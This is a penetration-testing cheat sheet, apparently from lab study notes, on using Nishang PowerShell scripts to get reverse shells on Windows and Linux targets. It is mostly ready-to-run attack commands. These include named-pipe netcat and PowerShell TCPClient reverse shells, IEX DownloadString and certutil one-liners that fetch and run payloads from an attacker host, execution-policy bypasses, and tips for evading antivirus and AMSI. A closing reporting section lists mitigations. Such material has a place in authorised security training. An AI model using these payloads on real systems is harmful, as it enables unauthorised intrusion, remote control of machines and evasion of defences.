π‘οΈ Methodology Checklist
- Load Nishang into PS session:
Import-Module /path/to/Nishang.psm1 - List available scripts:
Get-Command -Module Nishang - Reverse shell:
Invoke-PowerShellTcp -Reverse -IPAddress [LHOST] -Port [LPORT] - Start nc listener before execution:
nc -lvp [LPORT] - Exfiltrate data:
Invoke-Exfilor useOut-File+ file transfer - Use Invoke-Encode to obfuscate PS commands if AV flags
- Clean up: delete dropped scripts after use
π― Operational Context
Use when: Windows target with PowerShell access and AV that flags MSF payloads β Nishang PS1 scripts are often lower detection than compiled binaries.
Think Dumber First: Invoke-PowerShellTcp.ps1 is a one-liner reverse shell. Add the invoke call at the end of the script file and host via Python HTTP. IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/shell.ps1') β no file written to disk.
Skip when: AMSI is active and unpatched β AMSI will catch Nishang without bypass.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [TARGET_IP] 7777 > /tmp/f | Linux named pipe reverse shell payload |
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('[TARGET_IP]',443)..." | Windows fileless reverse shell payload |
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1 | Copy Nishang TCP shell script to working dir |
echo "Invoke-PowerShellTcp -Reverse -IPAddress [TARGET_IP] -Port 4444" >> shell.ps1 | Append trigger to end of Nishang script |
sudo python3 -m http.server 80 | Host the prepared payload on attacker web server |
sudo nc -lvnp 4444 | Start listener to catch the Nishang shell |
IEX(New-Object Net.WebClient).DownloadString('http://[TARGET_IP]/shell.ps1') | Fileless execution of Nishang payload (victim runs) |
certutil.exe -urlcache -split -f "http://[TARGET_IP]/shell.ps1" C:\Windows\Temp\shell.ps1 | Download Nishang script to disk (LOLBAS method) |
powershell -ep bypass -File C:\Windows\Temp\shell.ps1 | Execute downloaded script (bypass execution policy) |
wget "http://[TARGET_IP]/shell.ps1" -OutFile "shell.ps1"; .\shell.ps1 | Download and run (PS alias wget) |
π¬ Deep Dive & Workflow
What is a Payload?
A payload is the code executed on the target after exploitation. From the defensive view: the specific string AV scans and blocks. From the offensive view: the instructions given to the victim machine.
Linux: Named Pipe Payload Breakdown
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/fmkfifo /tmp/fβ named pipe acts as bidirectional data buffercat /tmp/f |β feed pipe content to bash as commands/bin/bash -i 2>&1β interactive bash, stderr merged into stdoutnc 10.10.14.12 7777 > /tmp/fβ nc sends output to attacker; attacker input goes back into pipe
Windows: PowerShell One-Liner Breakdown
The full one-liner creates a .NET TCPClient socket, reads attacker input in a loop, executes each command with iex, and sends output back:
$client.GetStream()β opens network streamiex $dataβ executes whatever the attacker types$sendback2β reconstructsPS C:\path>prompt for realistic terminal appearance
Nishang: The βAppend & Hostβ Workflow
Nishang scripts define the function but donβt call it. You must append the function call:
# 1. Copy to working directory
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
# 2. Append trigger (CRITICAL: use your tun0 IP)
echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.158 -Port 4444" >> shell.ps1
# 3. Serve + listen simultaneously
sudo python3 -m http.server 80 &
sudo nc -lvnp 4444Execution Method Comparison
| Method | Disk Write? | AV Risk | Use When |
|---|---|---|---|
| IEX + DownloadString | No (RAM) | Lower | Defender active, prefer fileless |
| certutil + PS | Yes | Higher | IEX blocked |
| wget/curl alias + run | Yes | Medium | Quick and easy lab method |
Context Awareness β Critical
| Shell Context | What to Run |
|---|---|
CMD prompt (C:\Windows\system32>) | powershell -nop -c "$client = ..." |
PowerShell prompt (PS C:\>) | $client = New-Object ... (drop the powershell prefix) |
Always identify your shell before pasting payloads β wrong prefix causes syntax errors.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Nishang script detected by Defender | AMSI signature match | Obfuscate: rename functions, encode with base64, or invoke via AMSI bypass first |
| Invoke-PowerShellTcp hangs after connect | Firewall blocking outbound | Confirm outbound port open from target: Test-NetConnection [LHOST] -Port [LPORT] |
| Script download fails | PowerShell execution policy | Bypass: powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/shell.ps1')" |
| Shell connects but no command output | Encoding issue | Use UTF8: modify script to add [Console]::OutputEncoding = [System.Text.Encoding]::UTF8 |
| HTTP server returns 404 for PS1 file | Python server in wrong directory | Confirm: python3 -m http.server 80 in directory containing the script |
π Reporting Trigger
Finding Title: PowerShell-Based Reverse Shell Execution via Nishang Impact: Nishang PowerShell payloads provide fully interactive reverse shells without writing binaries to disk, evading AV solutions that scan file system but not in-memory script execution. Root Cause: PowerShell remoting and unrestricted download/execution policy. No AMSI monitoring or Script Block Logging enabled. Recommendation: Enable PowerShell Constrained Language Mode. Configure AMSI with updated signatures. Enable Script Block Logging (Event ID 4104). Implement application allowlisting via AppLocker or WDAC.